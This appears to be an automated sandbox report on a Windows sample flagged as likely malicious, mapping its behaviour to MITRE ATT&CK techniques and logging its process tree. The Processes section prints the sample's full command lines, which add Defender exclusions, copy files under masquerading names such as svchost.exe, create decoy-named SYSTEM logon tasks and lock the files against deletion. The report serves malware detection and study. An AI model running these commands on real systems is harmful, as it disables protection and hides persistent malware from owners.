Malware Analysis Report

2024-09-11 05:28

Sample ID 240620-2ymn3a1gna
Target 1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe
SHA256 1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9
Tags
discovery execution exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9

Threat Level: Likely malicious

The file 1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery execution exploit

Command and Scripting Interpreter: PowerShell

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Views/modifies file attributes

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Persistence
TA0003
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Privilege Escalation
TA0004
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Defense Evasion
TA0005
File and Directory Permissions Modification
T1222
Hide Artifacts
T1564
Hidden Files and Directories
T1564.001
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-20 22:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-20 22:59

Reported

2024-06-20 23:02

Platform

win7-20240508-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2420 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe C:\Windows\system32\cmd.exe
PID 2420 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe C:\Windows\system32\cmd.exe
PID 2420 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe C:\Windows\system32\cmd.exe
PID 1640 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2368 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1640 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1640 wrote to memory of 2732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 564 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F6C.tmp\F6D.tmp\F6E.bat C:\Users\Admin\AppData\Local\Temp\1a0d6fd7204c9f89cb889b5d51f136f6c1e808d0a94e539aba8d626c9b6dbec9_NeikiAnalytics.exe"

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\stn.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\stn.exe" -r -force

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\svchost.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\svchost.exe" -r -force

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\conhost.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\conhost.exe" -r -force

C:\Windows\system32\takeown.exe

takeown /f "C:\programdata\anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\programdata\anydesk.exe" /reset

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "C:\programdata\anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/nts.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohcvs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/tsohnoc.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/microsoft/ksedynA.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/ksedynA.exe" -Destination "C:\ProgramData/Anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/nts.exe" -Destination "C:\ProgramData/stn.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/tsohcvs.exe" -Destination "C:\ProgramData/svchost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "C:\ProgramData/microsoft/tsohnoc.exe" -Destination "C:\ProgramData/conhost.exe" -r -force

C:\Windows\system32\schtasks.exe

schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN RestUpdaterHost /TR "C:\ProgramData/microsoft/ruh.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /run /tn "MicrosoftEdgeUpdateTaskList"

C:\Windows\system32\taskeng.exe

taskeng.exe {C497B91F-6A43-4058-A890-E23E2564A1EF} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\system32\schtasks.exe

schtasks /run /tn "SystemTaskNavigator"

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\taskeng.exe

taskeng.exe {30602BE2-B25F-48CC-9724-2B6593B707A8} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/svchost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/conhost.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

C:\Windows\system32\attrib.exe

attrib +r +s "C:\ProgramData/stn.exe"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)

Network

N/A

Files

